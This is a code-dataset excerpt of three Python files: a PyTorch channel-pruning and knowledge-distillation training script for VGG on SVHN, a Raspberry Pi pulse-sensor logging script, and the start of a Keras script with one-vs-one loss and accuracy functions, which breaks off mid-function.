0.0\n\n # Data loading\n print('=> Preparing data..')\n loader = Data(args)\n\n # Create model\n print('=> Building model...')\n \n model_t = import_module(f'model.{args.arch}').__dict__[args.teacher_model]().to(device)\n \n model_s = import_module(f'model.{args.arch}').__dict__[args.student_model](T = args.t).to(device)\n \n if args.pretrained:\n # Load pretrained weights\n ckpt = torch.load(args.teacher_dir + args.teacher_file, map_location = device)\n state_dict = ckpt['state_dict_s']\n \n model_dict_s = model_s.state_dict()\n model_dict_s.update(state_dict)\n model_s.load_state_dict(model_dict_s)\n model_s = model_s.to(device)\n \n model_t.load_state_dict(state_dict)\n model_t = model_t.to(device)\n \n models = [model_t, model_s]\n \n param_s = [param for name, param in model_s.named_parameters() if 'mask' not in name]\n param_m = [param for name, param in model_s.named_parameters() if 'mask' in name] \n\n optimizer_s = optim.SGD(param_s, lr = args.lr, momentum = args.momentum, weight_decay = args.weight_decay)\n optimizer_m = FISTA(param_m, lr = args.lr, gamma = args.sparse_lambda)\n\n scheduler_s = StepLR(optimizer_s, step_size = args.lr_decay_step, gamma = 0.1)\n scheduler_m = StepLR(optimizer_m, step_size = args.lr_decay_step, gamma = 0.1)\n\n resume = args.resume\n if resume:\n print('=> Resuming from ckpt {}'.format(resume))\n ckpt = torch.load(resume, map_location=device)\n best_prec1 = ckpt['best_prec1']\n start_epoch = ckpt['epoch']\n\n model_s.load_state_dict(ckpt['state_dict_s'])\n\n optimizer_s.load_state_dict(ckpt['optimizer_s'])\n optimizer_m.load_state_dict(ckpt['optimizer_m'])\n\n scheduler_s.load_state_dict(ckpt['scheduler_s'])\n scheduler_m.load_state_dict(ckpt['scheduler_m'])\n \n print('=> Continue from epoch {}...'.format(start_epoch))\n\n '''\n if args.test_only:\n test_prec1, test_prec5 = test(args, loader.loader_test, model_t)\n print('=> Test Prec@1: {:.2f}'.format(test_prec1))\n return\n '''\n\n optimizers = [optimizer_s, optimizer_m]\n schedulers = [scheduler_s, scheduler_m]\n \n for epoch in range(start_epoch, args.num_epochs):\n for s in schedulers:\n s.step(epoch)\n\n train(args, loader.loader_train, models, optimizers, epoch)\n test_prec1, test_prec5 = test(args, loader.loader_test, model_s, epoch)\n\n is_best = best_prec1 < test_prec1\n best_prec1 = max(test_prec1, best_prec1)\n best_prec5 = max(test_prec5, best_prec5)\n \n '''\n model_state_dict = model_t.module.state_dict() if len(args.gpus) > 1 else 
model_t.state_dict()\n '''\n \n state = {\n 'state_dict_s': model_s.state_dict(),\n 'best_prec1': best_prec1,\n 'best_prec5': best_prec5,\n \n 'optimizer_s': optimizer_s.state_dict(),\n 'optimizer_m': optimizer_m.state_dict(),\n 'scheduler_s': scheduler_s.state_dict(),\n 'scheduler_m': scheduler_m.state_dict(),\n 'epoch': epoch + 1\n }\n checkpoint.save_model(state, epoch + 1, is_best)\n \n \n model = import_module('utils.preprocess').__dict__[f'{args.arch}'](args, model_s.state_dict(), args.t)\n flops, params = get_model_complexity_info(model.to(device), (3, 32, 32), as_strings = False, print_per_layer_stat = False)\n compressionInfo(epoch, flops, params, test_prec1, test_prec5)\n\n print_logger.info(f\"Best @prec1: {best_prec1:.3f} @prec5: {best_prec5:.3f}\")\n\n best_model = torch.load(f'{args.job_dir}checkpoint/model_best.pt', map_location = device)\n\n\ndef compressionInfo(epoch, flops, params, test_prec1, test_prec5, org_gflops = 0.31469, org_params = 15):\n GFLOPs = flops / 10 ** 9\n params_num = params\n params_mem = params / 1000 ** 2\n pruned_FLOPs_ratio = (org_gflops - GFLOPs) / org_gflops\n pruned_param_ratio = (org_params - params_mem) / org_params\n \n test_prec1 = test_prec1.item()\n test_prec5 = test_prec5.item()\n \n print(f'Model FLOPs: {round(GFLOPs*1000, 2)} (-{round(pruned_FLOPs_ratio, 4) * 100} %)')\n print(f'Model params: {round(params_mem, 2)} (-{round(pruned_param_ratio, 4) * 100} %) MB')\n print(f'Model num of params: {round(params_num)}\\n')\n \n if not os.path.isdir(args.job_dir + '/run/plot'):\n os.makedirs(args.job_dir + '/run/plot') \n with open(args.job_dir + 'run/plot/compressInfo_r.txt', 'w') as f:\n f.write('epoch, top-1, top-5, flops, flops-pr, param_mb, param_mb-pr, num_param, \\n')\n \n with open(args.job_dir + 'run/plot/compressInfo.txt', 'a') as f:\n f.write(f'{epoch}, {round(test_prec1, 4)}, {round(test_prec5, 4)}, {round(GFLOPs*1000, 2)}, {round(pruned_FLOPs_ratio, 4) * 100}, {round(params_mem, 2)}, {round(pruned_param_ratio, 4) * 100}, {round(params_num)}\\n')\n \n with open(args.job_dir + 'run/plot/compressInfo_r.txt', 'a') as f:\n f.write('Epoch[{0}]\\n'.format(epoch))\n f.write('Top-1: {0}\\nTop-5: {1}\\n'.format(round(test_prec1, 4), round(test_prec5, 4)))\n f.write('FLOPs: {0} ({1} %)\\n'.format(round(GFLOPs*1000, 2), round(pruned_FLOPs_ratio, 4) * 100))\n f.write('Params: {0} ({1} %) MB\\n'.format(round(params_mem, 2), round(pruned_param_ratio, 4) * 100))\n f.write('Num of params: {}\\n'.format(round(params_num)))\n f.write('===========================\\n')\n \n \ndef train(args, loader_train, models, optimizers, epoch):\n losses_s = utils.AverageMeter()\n losses_sparse = utils.AverageMeter()\n losses_redundant = utils.AverageMeter()\n losses_cascade = utils.AverageMeter()\n losses_kd = utils.AverageMeter()\n \n top1 = utils.AverageMeter()\n top5 = utils.AverageMeter()\n\n model_t = models[0]\n model_s = models[1]\n \n for param in list(model_t.parameters())[:-2]:\n param.requires_grad = False\n \n for name, param in model_s.named_parameters():\n param.requires_grad = True\n \n cross_entropy = nn.CrossEntropyLoss()\n \n optimizer_s = optimizers[0]\n optimizer_m = optimizers[1]\n \n # switch to train mode\n model_t.train()\n model_s.train()\n \n num_iterations = len(loader_train)\n \n for i, (inputs, targets) in enumerate(loader_train, 1):\n num_iters = num_iterations * epoch + i\n\n inputs = inputs.to(device)\n targets = targets.to(device)\n \n optimizer_s.zero_grad()\n optimizer_m.zero_grad()\n\n \n ## train weights\n output_t = 
model_t(inputs).to(device)\n output_s = model_s(inputs).to(device)\n \n error_s = cross_entropy(output_s, targets)\n\n error_s.backward(retain_graph = True) # retain_graph = True\n \n losses_s.update(error_s.item(), inputs.size(0))\n \n writer_train.add_scalar('Performance_loss', error_s.item(), num_iters)\n \n \n ## train mask & surv\n if args.arch == 'vgg':\n \n attention = model_s.att # [batch_size, total_num_channels]\n mask = []\n for name in model_s.features._modules:\n if 'mask' in name:\n alpha = model_s.features._modules[name].alpha \n mask.append(alpha.view(-1))\n mask = torch.cat(mask)\n\n error_sparse = args.sparse_lambda * (torch.norm(mask, 1) / len(mask))\n error_sparse.backward(retain_graph = True)\n\n error_redundant_mimic = args.mask * torch.mean(1 - torch.sum(mask.view([1, -1]) * attention, dim = 1)/ torch.norm(mask, 2)) \n error_redundant_mimic.backward(retain_graph = True)\n \n \n losses_sparse.update(error_sparse.item(), inputs.size(0))\n writer_train.add_scalar('Sparse_loss', error_sparse.item(), num_iters)\n \n losses_redundant.update(error_redundant_mimic.item(), inputs.size(0))\n writer_train.add_scalar('Redundancy_imitation_loss', error_redundant_mimic.item(), num_iters)\n\n if args.t > 0:\n surv = model_s.weibull_fs\n surv = torch.cat(surv)\n \n error_info_cascade = args.sigma * (-1) * torch.mean(torch.log(surv + 1e-5))\n error_info_cascade.backward()\n \n losses_cascade.update(error_info_cascade.item(), inputs.size(0))\n writer_train.add_scalar('Cascades_fit_loss', error_info_cascade.item(), num_iters)\n \n error_kd = args.kd * (-1) * torch.mean(F.softmax(output_t, -1) * torch.log(F.softmax(output_s, -1)))\n error_kd.backward()\n \n losses_kd.update(error_kd.item(), inputs.size(0))\n writer_train.add_scalar('KD_loss', error_kd.item(), num_iters)\n \n ## step forward\n optimizer_s.step()\n \n decay = (epoch % args.lr_decay_step == 0 and i == 1)\n if num_iters % args.mask_step == 0:\n optimizer_m.step(decay)\n \n\n ## evaluate\n prec1, prec5 = utils.accuracy(output_s, targets, topk = (1, 5))\n top1.update(prec1[0], inputs.size(0))\n top5.update(prec5[0], inputs.size(0))\n \n writer_train.add_scalar('Train-top-1', top1.avg, num_iters)\n writer_train.add_scalar('Train-top-5', top5.avg, num_iters)\n \n if i % args.print_freq == 0:\n if args.t > 0:\n print_logger.info(\n 'Epoch[{0}]({1}/{2}): \\n'\n 'Train_loss: {train_loss.val:.4f} ({train_loss.avg:.4f})\\n'\n 'Sparse_loss: {sparse_loss.val:.4f} ({sparse_loss.avg:.4f})\\n'\n 'Redundant_loss: {redundant_loss.val:.4f} ({redundant_loss.avg:.4f})\\n'\n 'Cascade_loss: {cascade_loss.val:.4f} ({cascade_loss.avg:.4f})\\n'\n 'KD_loss: {kd_loss.val:.4f} ({kd_loss.avg:.4f})\\n'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f}), '\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'.format(\n epoch, i, num_iterations, \n train_loss = losses_s, \n sparse_loss = losses_sparse,\n redundant_loss = losses_redundant,\n cascade_loss = losses_cascade,\n kd_loss = losses_kd,\n top1 = top1, top5 = top5))\n else:\n print_logger.info(\n 'Epoch[{0}]({1}/{2}): \\n'\n 'Train_loss: {train_loss.val:.4f} ({train_loss.avg:.4f})\\n'\n 'Sparse_loss: {sparse_loss.val:.4f} ({sparse_loss.avg:.4f})\\n'\n 'Redundant_loss: {redundant_loss.val:.4f} ({redundant_loss.avg:.4f})\\n'\n 'KD_loss: {kd_loss.val:.4f} ({kd_loss.avg:.4f})\\n'\n 'Prec@1 {top1.val:.3f} ({top1.avg:.3f}), '\n 'Prec@5 {top5.val:.3f} ({top5.avg:.3f})\\n'.format(\n epoch, i, num_iterations, \n train_loss = losses_s,\n sparse_loss = losses_sparse,\n redundant_loss = losses_redundant,\n kd_loss = 
losses_kd,\n top1 = top1, top5 = top5))\n \n pruned = torch.sum(mask == 0).detach().cpu()\n num = len(mask)\n \n print_logger.info(\"Pruned {} / {}\\n\".format(pruned, num))\n \n \ndef test(args, loader_test, model_s, epoch):\n losses = utils.AverageMeter()\n top1 = utils.AverageMeter()\n top5 = utils.AverageMeter()\n\n cross_entropy = nn.CrossEntropyLoss()\n\n # switch to eval mode\n model_s.eval()\n \n num_iterations = len(loader_test)\n\n with torch.no_grad():\n for i, (inputs, targets) in enumerate(loader_test, 1):\n num_iters = num_iterations * epoch + i\n \n inputs = inputs.to(device)\n targets = targets.to(device)\n\n logits = model_s(inputs).to(device)\n loss = cross_entropy(logits, targets)\n \n writer_test.add_scalar('Test_loss', loss.item(), num_iters)\n \n prec1, prec5 = utils.accuracy(logits, targets, topk = (1, 5))\n losses.update(loss.item(), inputs.size(0))\n top1.update(prec1[0], inputs.size(0))\n top5.update(prec5[0], inputs.size(0))\n \n writer_test.add_scalar('Test-top-1', top1.avg, num_iters)\n writer_test.add_scalar('Test-top-5', top5.avg, num_iters)\n \n print_logger.info('Prec@1 {top1.avg:.3f} Prec@5 {top5.avg:.3f}\\n'\n '===============================================\\n'\n .format(top1 = top1, top5 = top5))\n\n return top1.avg, top5.avg\n \n\nif __name__ == '__main__':\n main()\n\n", "sub_path": "vgg-svhn/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13820, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.device", "line_number": 23, "usage_type": "call"}, {"api_name": "utils.options.args.gpus", "line_number": 23, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 23, "usage_type": "name"}, {"api_name": "utils.common.checkpoint", "line_number": 25, "usage_type": "call"}, {"api_name": "utils.options.args", "line_number": 25, "usage_type": "argument"}, {"api_name": "utils.common", "line_number": 25, "usage_type": "name"}, {"api_name": "utils.common.get_logger", "line_number": 26, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utils.options.args.job_dir", "line_number": 26, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 26, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 27, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 27, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 27, "usage_type": "name"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 28, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 28, "usage_type": "name"}, {"api_name": "data.svhn.Data", "line_number": 39, "usage_type": "call"}, {"api_name": "utils.options.args", "line_number": 39, "usage_type": "argument"}, {"api_name": "importlib.import_module", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.options.args.arch", "line_number": 44, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 44, "usage_type": "name"}, {"api_name": "utils.options.args.teacher_model", "line_number": 44, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 46, "usage_type": 
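The mask parameters in the vgg-svhn main.py record above are updated by the imported FISTA optimizer together with an L1 penalty (sparse_lambda). The record does not show FISTA's internals, so this is an illustrative assumption only: the heart of such an L1 solver is usually a soft-thresholding (proximal) step, sketched standalone here:

import torch

def soft_threshold(mask, lr, gamma):
    # Proximal step for lr * gamma * ||mask||_1: shrink magnitudes toward
    # zero and clamp anything below the threshold to exactly 0 (pruned).
    return torch.sign(mask) * torch.clamp(mask.abs() - lr * gamma, min=0.0)

m = torch.tensor([0.30, -0.02, 0.05, -0.40])
print(soft_threshold(m, lr=0.1, gamma=0.6))
# -> tensor([ 0.2400, -0.0000,  0.0000, -0.3400]); small values are pruned outright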
"call"}, {"api_name": "utils.options.args.arch", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 46, "usage_type": "name"}, {"api_name": "utils.options.args.student_model", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.options.args.t", "line_number": 46, "usage_type": "attribute"}, {"api_name": "utils.options.args.pretrained", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.options.args.teacher_dir", "line_number": 50, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 50, "usage_type": "name"}, {"api_name": "utils.options.args.teacher_file", "line_number": 50, "usage_type": "attribute"}, {"api_name": "torch.optim.SGD", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.options.args.lr", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 66, "usage_type": "name"}, {"api_name": "utils.options.args.momentum", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.options.args.weight_decay", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fista.FISTA", "line_number": 67, "usage_type": "call"}, {"api_name": "utils.options.args.lr", "line_number": 67, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 67, "usage_type": "name"}, {"api_name": "utils.options.args.sparse_lambda", "line_number": 67, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 69, "usage_type": "call"}, {"api_name": "utils.options.args.lr_decay_step", "line_number": 69, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.StepLR", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.options.args.lr_decay_step", "line_number": 70, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 70, "usage_type": "name"}, {"api_name": "utils.options.args.resume", "line_number": 72, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 75, "usage_type": "call"}, {"api_name": "utils.options.args.num_epochs", "line_number": 99, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 99, "usage_type": "name"}, {"api_name": "utils.options.args", "line_number": 103, "usage_type": "argument"}, {"api_name": "utils.options.args", "line_number": 104, "usage_type": "argument"}, {"api_name": "utils.options.args", "line_number": 128, "usage_type": "argument"}, {"api_name": "importlib.import_module", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.options.args.arch", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.options.args.t", "line_number": 128, "usage_type": "attribute"}, {"api_name": "ptflops.get_model_complexity_info", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 134, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 134, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 134, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 
151, "usage_type": "attribute"}, {"api_name": "utils.options.args.job_dir", "line_number": 151, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 151, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 152, "usage_type": "call"}, {"api_name": "utils.options.args.job_dir", "line_number": 152, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 152, "usage_type": "name"}, {"api_name": "utils.options.args.job_dir", "line_number": 153, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 153, "usage_type": "name"}, {"api_name": "utils.options.args.job_dir", "line_number": 156, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 156, "usage_type": "name"}, {"api_name": "utils.options.args.job_dir", "line_number": 159, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 159, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 169, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 169, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 170, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 170, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 171, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 171, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 172, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 172, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 173, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 173, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 175, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 175, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 176, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 176, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 187, "usage_type": "name"}, {"api_name": "utils.options.args.arch", "line_number": 222, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 222, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 230, "usage_type": "call"}, {"api_name": "utils.options.args.sparse_lambda", "line_number": 232, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 232, "usage_type": "name"}, {"api_name": "torch.norm", "line_number": 232, "usage_type": "call"}, {"api_name": "utils.options.args.mask", "line_number": 235, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 235, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 235, "usage_type": "call"}, {"api_name": "torch.norm", "line_number": 235, "usage_type": "call"}, {"api_name": "utils.options.args.t", "line_number": 245, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 245, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 247, "usage_type": "call"}, {"api_name": "utils.options.args.sigma", "line_number": 249, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 249, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 249, "usage_type": "call"}, {"api_name": "torch.log", 
"line_number": 249, "usage_type": "call"}, {"api_name": "utils.options.args.kd", "line_number": 255, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.mean", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 255, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 255, "usage_type": "name"}, {"api_name": "torch.log", "line_number": 255, "usage_type": "call"}, {"api_name": "utils.options.args.lr_decay_step", "line_number": 264, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 264, "usage_type": "name"}, {"api_name": "utils.options.args.mask_step", "line_number": 265, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 265, "usage_type": "name"}, {"api_name": "utils.common.accuracy", "line_number": 270, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 270, "usage_type": "name"}, {"api_name": "utils.options.args.print_freq", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.options.args.t", "line_number": 278, "usage_type": "attribute"}, {"api_name": "utils.options.args", "line_number": 278, "usage_type": "name"}, {"api_name": "torch.sum", "line_number": 311, "usage_type": "call"}, {"api_name": "utils.common.AverageMeter", "line_number": 318, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 318, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 319, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 319, "usage_type": "name"}, {"api_name": "utils.common.AverageMeter", "line_number": 320, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 320, "usage_type": "name"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 322, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 322, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 329, "usage_type": "call"}, {"api_name": "utils.common.accuracy", "line_number": 341, "usage_type": "call"}, {"api_name": "utils.common", "line_number": 341, "usage_type": "name"}]} +{"seq_id": "486869629", "text": "from pulsesensor import Pulsesensor\nimport time\nimport datetime\n\n# Init sensor\np = Pulsesensor()\n# Start measuring Heartbeat\np.startAsyncBPM()\n\n# Try to run code\ntry:\n # Run forever\n while True:\n # Prompt user for input and store key pressed\n input = 'y' #input(\"\\n\\nReady to measure Heartbeat (y/n)?\")\n # If user pressed 'y'\n if input == 'y':\n # Get current date & time\n now = datetime.datetime.now()\n filename = now.strftime(\"%b-%d-%Y-%H-%M-%S.txt\")\n print(\"Saving to file name %s\" % filename)\n # Open a file to append lines\n with open(filename, 'a') as file:\n # Run forever\n while True:\n # Get BPM\n bpm = p.BPM\n # Init line variable\n line = \"\"\n # If bpm found\n if bpm > 0:\n # Format BPM save in line variable\n line = \"BPM: %d\\n\" % bpm\n else:\n # Not found message\n line = \"No Heartbeat found\\n\"\n # Print line to console\n print(line)\n # Append line to file\n file.write(line)\n # Wait a second\n time.sleep(1)\n else:\n print(\"Not ready\")\n\n# If error\nexcept:\n # Stop measuring Heartbeat\n p.stopAsyncBPM()\n", "sub_path": "heartbeat.py", "file_name": "heartbeat.py", "file_ext": "py", "file_size_in_byte": 1494, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": 
"code-starcoder2", "pt": "32", "api": [{"api_name": "pulsesensor.Pulsesensor", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 19, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 19, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "123842763", "text": "# Basierend auf der Implementierung von Pornntiwa Pawara (https://www.ai.rug.nl/~p.pawara/dataset.php -> Tropic Dataset -> source code -> main.py)\nimport argparse\nfrom datetime import datetime\nimport pickle\nimport sys\nfrom pathlib import Path\n\nimport tensorflow as tf\nimport keras\nimport numpy as np\nimport tflearn.data_utils\n# Workaround für Modulfehler: tensorflow.python kann später aus irgendwelchen Gründen nicht mehr\n# direkt unter diesem Namen aufgerufen werden\n# Daher from ... import ... as tfclient um tensorflow.python.client später (als tfclient) noch verwenden zu können\nfrom tensorflow.python import client as tfclient # Nur wichtig um GPU-Name zu ermitteln\n\n# _WORK_DIR = Path(\"G://Bachelorarbeit\")\n_WORK_DIR = Path(\"/scratch/tmp/m_wolf37/Bachelorarbeit/\")\n_DATASET_DIR = Path(\"/scratch/tmp/m_wolf37/Bachelorarbeit/datasets_exps\")\n\ninit_learning_rate = 0.001\n_BATCH_SIZE = 16\n_OVO_MATRIX_TRANSPOSED = None\n_VERBOSE = True\n_DATA_AUGMENTATION = True\n\n\ndef get_learning_rate(epoch):\n \"\"\"Gibt Learning-Rate abhängig von aktueller Epoche zurück (alle 50 Epochen um 0.1 verringern)\"\"\"\n lr = init_learning_rate\n\n if epoch > 150:\n lr = 0.001 * init_learning_rate\n elif epoch > 100:\n lr = 0.01 * init_learning_rate\n elif epoch > 50:\n lr = 0.1 * init_learning_rate\n print(\"Epoche %s -> Learning-Rate: %s\" % (epoch, lr))\n return lr\n\n\ndef ovo_crossentropy_loss(y_true, y_pred):\n \"\"\"Berechnet die OvO Crossentropy nach der Formel aus dem Paper von Pawara et al.\"\"\"\n # Bei OvO wird als Aktivierungsfunktion 'tanh' verwendet. Diese produziert Werte aus (-1, 1)\n # Auf Wertebereich [0,1] hochskalieren (eigentlich möchte man (0,1) erreichen um später im Logarithmus\n # keine undefinierten Werte zu erhalten, aber wegen numerischen Problemen sind auch 0 und 1 denkbare Werte)\n y_true_scaled = (y_true + 1.0) / 2.0\n y_pred_scaled = (y_pred + 1.0) / 2.0\n\n # Wertebereich von y_pred_scaled von [0,1] auf [0.00001, 0.99999] einschränken wegen Logarithmen. Näherung an (0,1)\n\n zeroes = tf.zeros_like(y_pred_scaled) # Tensor mit gleicher Dimension wie 'y_pred_scaled' bestehend aus nur 0en\n # Alle kleineren Werte als 0.00001 in 'y_pred_scaled' auf 0.00001 setzen (untere Schranke für Wertebereich)\n y_pred_scaled = tf.where(y_pred_scaled < 0.00001, zeroes + 0.00001, y_pred_scaled)\n # Alle größeren Werte als 0.99999 in 'y_pred_scaled' auf 0.99999 setzen (obere Schranke für Wertebereich)\n y_pred_scaled = tf.where(y_pred_scaled > 0.99999, zeroes + 0.99999, y_pred_scaled)\n\n # J_{OvO} aus Pawara et al. 
anwenden\n log_function = tf.log if tf.__version__ == \"1.13.1\" else tf.math.log # flexibel für neue / alte Version\n loss = - tf.reduce_mean(\n y_true_scaled * log_function(y_pred_scaled) + (1 - y_true_scaled) * log_function(1 - y_pred_scaled))\n return loss\n\n\ndef ovo_accuracy_metric(y_true, y_pred):\n \"\"\"Errechnet die vorhergesagte Klasse aus der OvO-kodierten Netzausgabe (y_pred) und berechnet mit Hilfe der\n erwarteten Klasse (y_true, ebenfalls OvO-kodiert) die Accuracy\"\"\"\n # OvO Matrix als Single-Precision float\n single_prec_matrix = _OVO_MATRIX_TRANSPOSED.astype(np.single)\n # One-Hot kodierten Wahrscheinlichkeitsvektor aus OvO-Kodierung berechnen\n y_true_one_hot = tf.tensordot(y_true, single_prec_matrix, axes=1)\n y_pred_one_hot = tf.tensordot(y_pred, single_prec_matrix, axes=1)\n # Klassennummern berechnen (argmax des One-Hot kodierten Wahrscheinlichkeitsvektors)\n true_class = keras.backend.argmax(y_true_one_hot, axis=-1)\n pred_class = keras.backend.argmax(y_pred_one_hot, axis=-1)\n # Zählen, wie oft erwartete und vorhergesagte Klasse übereinstimmen\n correct_pred = keras.backend.equal(true_class, pred_class)\n return keras.backend.mean(correct_pred)\n\n\ndef load_dataset(dataset_name: str, fold_name: str, train_percent: int, is_ovo: bool, img_size: int):\n \"\"\"Lädt einen Datensatz entsprechend der übergebenen Parameter\"\"\"\n # Zu ladendes Verzeichnis\n dir_to_load = _DATASET_DIR / dataset_name / \"exps\" / fold_name\n # train und test Unterordner\n train_dir = dir_to_load / (\"train_\" + str(train_percent))\n test_dir = dir_to_load / \"test\"\n\n print(\"Lade Datensatz aus %s\" % str(dir_to_load))\n print(\"Train-Bilder aus %s\" % str(train_dir))\n print(\"Test-Bilder aus %s\" % str(test_dir))\n # categorical_labels=True sorgt dafür, dass die Label als One-Hot (bzw. als Zielvektor) kodiert geladen werden\n # =False lädt einfach nur die Klassennummer\n x_train, y_train = tflearn.data_utils.image_preloader(train_dir, image_shape=(img_size, img_size), grayscale=False,\n mode=\"folder\", categorical_labels=not is_ovo, normalize=True)\n x_test, y_test = tflearn.data_utils.image_preloader(test_dir, image_shape=(img_size, img_size), grayscale=False,\n mode=\"folder\", categorical_labels=not is_ovo, normalize=True)\n\n print(\"Lade Train-Bilder...\")\n x_train = np.asarray(x_train)\n print(\"Lade Test-Bilder...\")\n x_test = np.asarray(x_test)\n print(\"Lade Train-Label...\")\n y_train = np.asarray(y_train)\n print(\"Lade Test-Label...\")\n y_test = np.asarray(y_test)\n\n assert x_train.__len__() == y_train.__len__()\n assert x_test.__len__() == y_test.__len__()\n\n print(\"Bilder im Train-Split %s\" % x_train.__len__())\n print(\"Bilder im Test-Split %s\" % x_test.__len__())\n\n # Im kompletten Train-Split (ohne train_size Prozent auszuwählen) liegen eigentlich so viele Dateien:\n complete_train_split_path = train_dir.parent / \"train_100\" # voller Trainsplit liegt im train_100 Ordner (100%)\n # Zähle, wie groß der komplette Trainsplit (100%) ist\n orig_number_train = 0\n for klasse in complete_train_split_path.iterdir():\n orig_number_train += [f for f in klasse.iterdir()].__len__()\n\n print(\"Trainiere auf %s Prozent des Train-Splits. %s / %s Bildern im Train-Split\" % (\n train_percent, x_train.__len__(), orig_number_train))\n print(\"Testsplit enthält %s Bilder\" % x_test.__len__())\n\n # wie bei Pawara et al. 
